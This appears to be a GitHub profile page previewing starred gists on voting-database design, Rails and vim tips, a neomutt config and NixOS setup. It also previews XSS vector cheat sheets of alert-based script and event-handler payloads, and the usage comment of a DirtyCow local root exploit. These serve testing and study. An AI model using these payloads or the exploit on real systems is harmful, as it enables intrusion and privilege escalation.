Skip to content

Instantly share code, notes, and snippets.

View Abdulwahaab710's full-sized avatar
🇵🇸
Palestine will be free ✌🏽

Abdulwahaab Ahmed 🍉 Abdulwahaab710

🇵🇸
Palestine will be free ✌🏽
145 followers · 45 following
View GitHub Profile
@NikhilPeri
NikhilPeri / Secure and Verifiable Database Schema.md
Created March 21, 2018 12:33

Anonymous Verifiable Database

This document outlines solutions to building the database for a voting system with the following features:

  • Anonymous means that it is not possible to associate a vote back to a single citizen, but a citizen can log back in and review their ballot was cast correctly.
  • Personally Verifiable means that we can automatically detect their vote was counted as they cast it this is something that is not possible in the current voting system
  • Publicly Verifiable__ means that we can automatically go through the database and independently count the votes and ensure they have not been altered
@berzerk0
berzerk0 / CTFWRITE-ZorZ@Vulnhub.md
Last active August 5, 2023 13:35
A Few WebApp File Upload Vulnerabilities Explained - CTF Writeup: Zorz

This gist has been DEPRECATED.

The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/ZorZ-Vulnhub.html

Updates will be reflected on GITPAGE VERSIONS ONLY

A Few WebApp File Upload Vulnerabilities Explained - CTF Writeup: Zorz

20 November 2017

This is "CTF" is more of a vulnerability sandbox than a true Capture the Flag challenge. However, it is a great way to explore some WebApp Upload vulnerabilities.

The VulnHub description says:

@VladimirPal
VladimirPal / neomuttrc
Last active March 30, 2024 11:59
Minimal neomutt config for gmail imap
set imap_user="mail.vpal@gmail.com"
set imap_pass=`/usr/bin/security find-generic-password -w -a 'mail.vpal@gmail.com' -s 'Gmail'`
set folder=imaps://imap.gmail.com/
set spoolfile=+INBOX
set record="+[Gmail]/Sent Mail"
set postponed="+[Gmail]/Drafts"
# https://www.neomutt.org/guide/reference search sleep_time for additional info
set sleep_time=0 # be faster
@HelioCampos
HelioCampos / database_migration_best_practices.md
Created September 28, 2017 14:00
Database migration best practices for Rails

Database migration best practices for Rails

Never ever change data on schema changes! [1]

Use rake tasks to change the data! [1]

This decouples a deployment from completed migrations. Give us control of the data manipulation proccess by encapsulatin it in on place. need to remember to:

  1. Run it in one of the ways bellow: a. Add this rake task the deployment script or;
@kurobeats
kurobeats / xss_vectors.txt
Last active July 15, 2024 23:05
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@rverton
rverton / cowroot.c
Created October 21, 2016 14:06
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@martijnvermaat
martijnvermaat / nixos.md
Last active July 13, 2024 09:08
Installation of NixOS with encrypted root
@v0d1ch
v0d1ch / vimgist
Last active September 29, 2023 12:48
vim replace newline with comma
1,$s/\n/,/g #replace comma with new line
%norm A* #append * to every line
bufdo! %s/FIND/REPLACE/g # search all buffers
@iangreenleaf
iangreenleaf / gist:b206d09c587e8fc6399e
Last active June 20, 2024 02:39
Rails naming conventions

Rails naming conventions

General Ruby conventions

Class names are CamelCase.

Methods and variables are snake_case.

Methods with a ? suffix will return a boolean.

@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>